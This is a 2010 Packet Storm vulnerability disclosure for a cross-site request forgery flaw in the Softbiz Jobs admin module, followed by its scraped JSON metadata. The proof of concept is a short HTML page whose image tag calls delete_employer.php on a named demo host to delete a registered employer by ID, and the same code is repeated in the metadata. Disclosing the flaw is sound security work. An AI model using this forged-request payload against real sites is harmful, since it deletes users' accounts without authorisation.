ID PACKETSTORM:86597 Type packetstorm Reporter Pratul Agrawal Modified 2010-02-24T00:00:00
Description
`
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# URL http://demos1.softbiz.com/scripts/seojobs/admin/
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
Example-
...................................................................................................................
<html>
<body>
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 />
</body>
</html>
...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
`
{"sourceHref": "https://packetstormsecurity.com/files/download/86597/softbizjobs-xsrf.txt", "sourceData": "` \n \n \n \n======================================================================= \n \nSoftbiz Jobs CSRF Vulnerability \n======================================================================= \n \nby \n \nPratul Agrawal \n \n \n# Vulnerability found in- Admin module \n \n# email Pratulag@yahoo.com \n \n# company aksitservices \n \n# Credit by Pratul Agrawal \n \n# Download http://www.softbizscripts.com/ \n \n# Script softbizscripts \n \n# URL http://demos1.softbiz.com/scripts/seojobs/admin/ \n \n \n \n# Proof of concept \n \nScript to delete the registered user through Cross Site request forgery \n \n................................................................................................................... \n \n<html> \n \n<body> \n \n<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> \n \n</body> \n \n</html> \n \n \n................................................................................................................... \n \n \nExample- \n................................................................................................................... \n \n<html> \n \n<body> \n \n<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 /> \n \n</body> \n \n</html> \n \n \n................................................................................................................... \n \nAfter execution refresh teh page and u can see that user having id=20 get deleted automatically. \n \n \n#If you have any questions, comments, or concerns, feel free to contact me. \n`\n", "edition": 1, "references": [], "modified": "2010-02-24T00:00:00", "hash": "723dc7d730fa2f3a7c0abe99dde1a890045a52806c46a4d5cd593324613dca97", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/86597/Softbiz-Jobs-Cross-Site-Request-Forgery.html", "description": "", "id": "PACKETSTORM:86597", "reporter": "Pratul Agrawal", "lastseen": "2016-11-03T10:22:37", "published": "2010-02-24T00:00:00", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-03T10:22:37"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:37"}, "vulnersScore": 0.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Softbiz Jobs Cross Site Request Forgery", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "adf2eccd37302491966cf78dcbc7d42b", "key": "href"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ce736cfd61e25f56ecd46eef1332867a", "key": "reporter"}, {"hash": "cebb775379511f0fba6e520b245c5c93", "key": "sourceData"}, {"hash": "e3ea5f0f2a0b52aec009060f1ea392e0", "key": "sourceHref"}, {"hash": "d1d64cd88c9688ea7c2f2cfa252cdf9d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}